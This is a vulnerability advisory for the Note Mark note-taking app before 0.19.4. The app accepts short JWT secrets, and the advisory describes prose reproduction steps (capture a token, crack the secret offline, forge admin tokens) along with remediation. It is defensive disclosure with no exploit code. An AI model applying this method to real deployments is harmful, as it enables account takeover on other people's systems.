Note Mark JWT Secret Weakness Allows Full Account Takeover via Token Forgery

A vulnerability in Note Mark, an open-source note-taking application, prior to version 0.19.4, allows for full account takeover through token forgery. The issue arises because the application does not enforce a minimum length or entropy for the JWT_SECRET configuration value. As a result, the application accepts any base64-decodable secret, including those as short as 1 byte. This vulnerability is critical, as it enables an attacker to capture a valid JWT, crack the signing secret offline, forge JWTs for any user (including administrators), and authenticate without credentials, all without server-side detection or rate limiting.

Impact

Exploiting this vulnerability allows an attacker to capture a valid JWT, crack the signing secret offline, forge JWTs for any user ID (including administrators), and authenticate without knowing any credentials, leading to full account takeover across the application.

Reproduction

To reproduce this vulnerability, deploy Note Mark with a JWT secret shorter than 32 bytes (after base64 decoding). Authenticate and capture a valid JWT. Then, perform an offline brute-force or dictionary attack against the token signature to recover the secret. Once the secret is obtained, generate a forged JWT for another user and use the forged token to access protected endpoints.

Remediation

Users are advised to update to Note Mark version 0.19.4 or later, where this vulnerability has been fixed. Additionally, ensure that JWT secrets are at least 32 bytes (256 bits) after base64 decoding and reject weaker secrets during configuration parsing.